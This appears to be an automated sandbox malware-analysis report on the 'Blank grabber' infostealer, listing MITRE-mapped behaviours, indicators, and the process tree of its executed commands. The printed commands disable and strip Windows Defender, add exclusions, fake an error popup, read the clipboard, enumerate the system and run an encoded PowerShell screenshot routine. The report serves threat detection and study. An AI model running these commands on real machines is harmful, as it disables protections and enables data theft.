504c0250247b992134cc818d623a825ec4ae855a02b51875ca80d022a6626f07

Analysis

max time kernel
99s
max time network
122s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241211-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
12-12-2024 01:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Blank grabber.exe
Size

7.8MB
MD5

b7a8afaf2f9015816da8bf2b16e34353
SHA1

372aaa07e086c1b02d008a1180101ba7e8850a05
SHA256

504c0250247b992134cc818d623a825ec4ae855a02b51875ca80d022a6626f07
SHA512

b0359bee453c62816136e6f76631b599ed2c28a7469a27fd13a1dc18c09247abf7040d42b34fb53c9633de52bc4782b940b81c1f84501bb5f1ad3fbf737d45f9
SSDEEP

196608:QqD+kdjwfI9jUCBB7m+mKOY7rXrZusoSDmhfvsbnTNeWP:z5mIHL7HmBYXrYSaUNh

Score

10^/10

collection credential_access defense_evasion discovery evasion execution spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
3908	MpCmdRun.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
460	powershell.exe
1864	powershell.exe
1840	powershell.exe
1200	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Blank grabber.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3432	cmd.exe
2712	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
3460	rar.exe

Loads dropped DLL 16 IoCs

pid	Process
752	Blank grabber.exe
752	Blank grabber.exe
752	Blank grabber.exe
752	Blank grabber.exe
752	Blank grabber.exe
752	Blank grabber.exe
752	Blank grabber.exe
752	Blank grabber.exe
752	Blank grabber.exe
752	Blank grabber.exe
752	Blank grabber.exe
752	Blank grabber.exe
752	Blank grabber.exe
752	Blank grabber.exe
752	Blank grabber.exe
752	Blank grabber.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
12	discord.com
13	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
10	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
3800	tasklist.exe
1172	tasklist.exe
3860	tasklist.exe
3084	tasklist.exe

UPX packed file 54 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0029000000046223-21.dat	upx
behavioral1/memory/752-25-0x00007FFFD9A00000-0x00007FFFDA065000-memory.dmp	upx
behavioral1/files/0x002e000000046203-28.dat	upx
behavioral1/memory/752-48-0x00007FFFF23A0000-0x00007FFFF23AF000-memory.dmp	upx
behavioral1/memory/752-47-0x00007FFFEE0A0000-0x00007FFFEE0C7000-memory.dmp	upx
behavioral1/files/0x002600000004621d-46.dat	upx
behavioral1/files/0x002600000004621c-45.dat	upx
behavioral1/files/0x002600000004621b-44.dat	upx
behavioral1/files/0x002600000004621a-43.dat	upx
behavioral1/files/0x002600000004620e-42.dat	upx
behavioral1/files/0x002600000004620a-41.dat	upx
behavioral1/files/0x002e000000046209-40.dat	upx
behavioral1/files/0x002d000000046202-39.dat	upx
behavioral1/files/0x0028000000046230-38.dat	upx
behavioral1/files/0x002800000004622f-37.dat	upx
behavioral1/files/0x002800000004622e-36.dat	upx
behavioral1/files/0x0029000000046222-33.dat	upx
behavioral1/files/0x0029000000046220-32.dat	upx
behavioral1/files/0x0029000000046221-30.dat	upx
behavioral1/memory/752-54-0x00007FFFECE10000-0x00007FFFECE3B000-memory.dmp	upx
behavioral1/memory/752-56-0x00007FFFEF9C0000-0x00007FFFEF9D9000-memory.dmp	upx
behavioral1/memory/752-58-0x00007FFFECD90000-0x00007FFFECDB5000-memory.dmp	upx
behavioral1/memory/752-60-0x00007FFFE89B0000-0x00007FFFE8B2F000-memory.dmp	upx
behavioral1/memory/752-62-0x00007FFFEEFA0000-0x00007FFFEEFB9000-memory.dmp	upx
behavioral1/memory/752-68-0x00007FFFEC8F0000-0x00007FFFEC923000-memory.dmp	upx
behavioral1/memory/752-71-0x00007FFFE88E0000-0x00007FFFE89AE000-memory.dmp	upx
behavioral1/memory/752-69-0x00007FFFD94C0000-0x00007FFFD99F3000-memory.dmp	upx
behavioral1/memory/752-67-0x00007FFFD9A00000-0x00007FFFDA065000-memory.dmp	upx
behavioral1/memory/752-64-0x00007FFFECE00000-0x00007FFFECE0D000-memory.dmp	upx
behavioral1/memory/752-73-0x00007FFFECD70000-0x00007FFFECD84000-memory.dmp	upx
behavioral1/memory/752-75-0x00007FFFECD60000-0x00007FFFECD6D000-memory.dmp	upx
behavioral1/memory/752-80-0x00007FFFE8820000-0x00007FFFE88D3000-memory.dmp	upx
behavioral1/memory/752-191-0x00007FFFECD90000-0x00007FFFECDB5000-memory.dmp	upx
behavioral1/memory/752-220-0x00007FFFE89B0000-0x00007FFFE8B2F000-memory.dmp	upx
behavioral1/memory/752-278-0x00007FFFEC8F0000-0x00007FFFEC923000-memory.dmp	upx
behavioral1/memory/752-290-0x00007FFFD94C0000-0x00007FFFD99F3000-memory.dmp	upx
behavioral1/memory/752-297-0x00007FFFE88E0000-0x00007FFFE89AE000-memory.dmp	upx
behavioral1/memory/752-299-0x00007FFFD9A00000-0x00007FFFDA065000-memory.dmp	upx
behavioral1/memory/752-305-0x00007FFFE89B0000-0x00007FFFE8B2F000-memory.dmp	upx
behavioral1/memory/752-336-0x00007FFFD9A00000-0x00007FFFDA065000-memory.dmp	upx
behavioral1/memory/752-359-0x00007FFFECE00000-0x00007FFFECE0D000-memory.dmp	upx
behavioral1/memory/752-360-0x00007FFFEC8F0000-0x00007FFFEC923000-memory.dmp	upx
behavioral1/memory/752-358-0x00007FFFEEFA0000-0x00007FFFEEFB9000-memory.dmp	upx
behavioral1/memory/752-357-0x00007FFFE89B0000-0x00007FFFE8B2F000-memory.dmp	upx
behavioral1/memory/752-356-0x00007FFFECD90000-0x00007FFFECDB5000-memory.dmp	upx
behavioral1/memory/752-355-0x00007FFFEF9C0000-0x00007FFFEF9D9000-memory.dmp	upx
behavioral1/memory/752-354-0x00007FFFECE10000-0x00007FFFECE3B000-memory.dmp	upx
behavioral1/memory/752-353-0x00007FFFF23A0000-0x00007FFFF23AF000-memory.dmp	upx
behavioral1/memory/752-352-0x00007FFFEE0A0000-0x00007FFFEE0C7000-memory.dmp	upx
behavioral1/memory/752-351-0x00007FFFD94C0000-0x00007FFFD99F3000-memory.dmp	upx
behavioral1/memory/752-347-0x00007FFFE88E0000-0x00007FFFE89AE000-memory.dmp	upx
behavioral1/memory/752-350-0x00007FFFE8820000-0x00007FFFE88D3000-memory.dmp	upx
behavioral1/memory/752-349-0x00007FFFECD60000-0x00007FFFECD6D000-memory.dmp	upx
behavioral1/memory/752-348-0x00007FFFECD70000-0x00007FFFECD84000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
64	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4968	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 37 IoCs

pid	Process
460	powershell.exe
1864	powershell.exe
460	powershell.exe
1840	powershell.exe
1864	powershell.exe
1840	powershell.exe
1840	powershell.exe
2312	WMIC.exe
2312	WMIC.exe
2312	WMIC.exe
2312	WMIC.exe
2712	powershell.exe
2712	powershell.exe
2712	powershell.exe
2504	powershell.exe
2504	powershell.exe
2504	powershell.exe
4676	WMIC.exe
4676	WMIC.exe
4676	WMIC.exe
4676	WMIC.exe
3224	WMIC.exe
3224	WMIC.exe
3224	WMIC.exe
3224	WMIC.exe
4636	WMIC.exe
4636	WMIC.exe
4636	WMIC.exe
4636	WMIC.exe
1200	powershell.exe
1200	powershell.exe
64	WMIC.exe
64	WMIC.exe
64	WMIC.exe
64	WMIC.exe
1344	powershell.exe
1344	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	460	powershell.exe
Token: SeDebugPrivilege	1864	powershell.exe
Token: SeDebugPrivilege	1840	powershell.exe
Token: SeDebugPrivilege	3800	tasklist.exe
Token: SeDebugPrivilege	1172	tasklist.exe
Token: SeIncreaseQuotaPrivilege	460	powershell.exe
Token: SeSecurityPrivilege	460	powershell.exe
Token: SeTakeOwnershipPrivilege	460	powershell.exe
Token: SeLoadDriverPrivilege	460	powershell.exe
Token: SeSystemProfilePrivilege	460	powershell.exe
Token: SeSystemtimePrivilege	460	powershell.exe
Token: SeProfSingleProcessPrivilege	460	powershell.exe
Token: SeIncBasePriorityPrivilege	460	powershell.exe
Token: SeCreatePagefilePrivilege	460	powershell.exe
Token: SeBackupPrivilege	460	powershell.exe
Token: SeRestorePrivilege	460	powershell.exe
Token: SeShutdownPrivilege	460	powershell.exe
Token: SeDebugPrivilege	460	powershell.exe
Token: SeSystemEnvironmentPrivilege	460	powershell.exe
Token: SeRemoteShutdownPrivilege	460	powershell.exe
Token: SeUndockPrivilege	460	powershell.exe
Token: SeManageVolumePrivilege	460	powershell.exe
Token: 33	460	powershell.exe
Token: 34	460	powershell.exe
Token: 35	460	powershell.exe
Token: 36	460	powershell.exe
Token: SeIncreaseQuotaPrivilege	2312	WMIC.exe
Token: SeSecurityPrivilege	2312	WMIC.exe
Token: SeTakeOwnershipPrivilege	2312	WMIC.exe
Token: SeLoadDriverPrivilege	2312	WMIC.exe
Token: SeSystemProfilePrivilege	2312	WMIC.exe
Token: SeSystemtimePrivilege	2312	WMIC.exe
Token: SeProfSingleProcessPrivilege	2312	WMIC.exe
Token: SeIncBasePriorityPrivilege	2312	WMIC.exe
Token: SeCreatePagefilePrivilege	2312	WMIC.exe
Token: SeBackupPrivilege	2312	WMIC.exe
Token: SeRestorePrivilege	2312	WMIC.exe
Token: SeShutdownPrivilege	2312	WMIC.exe
Token: SeDebugPrivilege	2312	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2312	WMIC.exe
Token: SeRemoteShutdownPrivilege	2312	WMIC.exe
Token: SeUndockPrivilege	2312	WMIC.exe
Token: SeManageVolumePrivilege	2312	WMIC.exe
Token: 33	2312	WMIC.exe
Token: 34	2312	WMIC.exe
Token: 35	2312	WMIC.exe
Token: 36	2312	WMIC.exe
Token: SeDebugPrivilege	3860	tasklist.exe
Token: SeDebugPrivilege	2712	powershell.exe
Token: SeIncreaseQuotaPrivilege	1864	powershell.exe
Token: SeSecurityPrivilege	1864	powershell.exe
Token: SeTakeOwnershipPrivilege	1864	powershell.exe
Token: SeLoadDriverPrivilege	1864	powershell.exe
Token: SeSystemProfilePrivilege	1864	powershell.exe
Token: SeSystemtimePrivilege	1864	powershell.exe
Token: SeProfSingleProcessPrivilege	1864	powershell.exe
Token: SeIncBasePriorityPrivilege	1864	powershell.exe
Token: SeCreatePagefilePrivilege	1864	powershell.exe
Token: SeBackupPrivilege	1864	powershell.exe
Token: SeRestorePrivilege	1864	powershell.exe
Token: SeShutdownPrivilege	1864	powershell.exe
Token: SeDebugPrivilege	1864	powershell.exe
Token: SeSystemEnvironmentPrivilege	1864	powershell.exe
Token: SeRemoteShutdownPrivilege	1864	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2144 wrote to memory of 752	2144	Blank grabber.exe	79
PID 2144 wrote to memory of 752	2144	Blank grabber.exe	79
PID 752 wrote to memory of 2528	752	Blank grabber.exe	80
PID 752 wrote to memory of 2528	752	Blank grabber.exe	80
PID 752 wrote to memory of 3252	752	Blank grabber.exe	81
PID 752 wrote to memory of 3252	752	Blank grabber.exe	81
PID 752 wrote to memory of 756	752	Blank grabber.exe	82
PID 752 wrote to memory of 756	752	Blank grabber.exe	82
PID 752 wrote to memory of 3352	752	Blank grabber.exe	84
PID 752 wrote to memory of 3352	752	Blank grabber.exe	84
PID 3252 wrote to memory of 1840	3252	cmd.exe	88
PID 3252 wrote to memory of 1840	3252	cmd.exe	88
PID 2528 wrote to memory of 1864	2528	cmd.exe	89
PID 2528 wrote to memory of 1864	2528	cmd.exe	89
PID 3352 wrote to memory of 460	3352	cmd.exe	90
PID 3352 wrote to memory of 460	3352	cmd.exe	90
PID 756 wrote to memory of 4412	756	cmd.exe	91
PID 756 wrote to memory of 4412	756	cmd.exe	91
PID 752 wrote to memory of 2360	752	Blank grabber.exe	92
PID 752 wrote to memory of 2360	752	Blank grabber.exe	92
PID 752 wrote to memory of 2640	752	Blank grabber.exe	93
PID 752 wrote to memory of 2640	752	Blank grabber.exe	93
PID 2360 wrote to memory of 3800	2360	cmd.exe	96
PID 2360 wrote to memory of 3800	2360	cmd.exe	96
PID 2640 wrote to memory of 1172	2640	cmd.exe	97
PID 2640 wrote to memory of 1172	2640	cmd.exe	97
PID 752 wrote to memory of 1368	752	Blank grabber.exe	146
PID 752 wrote to memory of 1368	752	Blank grabber.exe	146
PID 752 wrote to memory of 3432	752	Blank grabber.exe	99
PID 752 wrote to memory of 3432	752	Blank grabber.exe	99
PID 752 wrote to memory of 2860	752	Blank grabber.exe	101
PID 752 wrote to memory of 2860	752	Blank grabber.exe	101
PID 752 wrote to memory of 4796	752	Blank grabber.exe	103
PID 752 wrote to memory of 4796	752	Blank grabber.exe	103
PID 752 wrote to memory of 1684	752	Blank grabber.exe	106
PID 752 wrote to memory of 1684	752	Blank grabber.exe	106
PID 752 wrote to memory of 692	752	Blank grabber.exe	107
PID 752 wrote to memory of 692	752	Blank grabber.exe	107
PID 752 wrote to memory of 1648	752	Blank grabber.exe	108
PID 752 wrote to memory of 1648	752	Blank grabber.exe	108
PID 1368 wrote to memory of 2312	1368	cmd.exe	114
PID 1368 wrote to memory of 2312	1368	cmd.exe	114
PID 2860 wrote to memory of 3860	2860	cmd.exe	115
PID 2860 wrote to memory of 3860	2860	cmd.exe	115
PID 3432 wrote to memory of 2712	3432	cmd.exe	116
PID 3432 wrote to memory of 2712	3432	cmd.exe	116
PID 4796 wrote to memory of 4464	4796	cmd.exe	135
PID 4796 wrote to memory of 4464	4796	cmd.exe	135
PID 1684 wrote to memory of 4968	1684	cmd.exe	118
PID 1684 wrote to memory of 4968	1684	cmd.exe	118
PID 692 wrote to memory of 2772	692	cmd.exe	119
PID 692 wrote to memory of 2772	692	cmd.exe	119
PID 1648 wrote to memory of 2504	1648	cmd.exe	120
PID 1648 wrote to memory of 2504	1648	cmd.exe	120
PID 752 wrote to memory of 4344	752	Blank grabber.exe	145
PID 752 wrote to memory of 4344	752	Blank grabber.exe	145
PID 752 wrote to memory of 4196	752	Blank grabber.exe	123
PID 752 wrote to memory of 4196	752	Blank grabber.exe	123
PID 4344 wrote to memory of 3120	4344	cmd.exe	124
PID 4344 wrote to memory of 3120	4344	cmd.exe	124
PID 752 wrote to memory of 4072	752	Blank grabber.exe	126
PID 752 wrote to memory of 4072	752	Blank grabber.exe	126
PID 4196 wrote to memory of 4756	4196	cmd.exe	128
PID 4196 wrote to memory of 4756	4196	cmd.exe	128

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4756	attrib.exe
1120	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Blank grabber.exe
"C:\Users\Admin\AppData\Local\Temp\Blank grabber.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2144
- C:\Users\Admin\AppData\Local\Temp\Blank grabber.exe
  "C:\Users\Admin\AppData\Local\Temp\Blank grabber.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Blank grabber.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2528
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Blank grabber.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3252
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1840
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:3908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Pkg_resources Not installed!', 0, 'Error', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:756
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Pkg_resources Not installed!', 0, 'Error', 0+16);close()"
      4⤵
      PID:4412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3352
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‎ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2360
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2640
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1172
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1368
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:3432
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2860
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4796
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1684
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:692
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:2772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1648
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
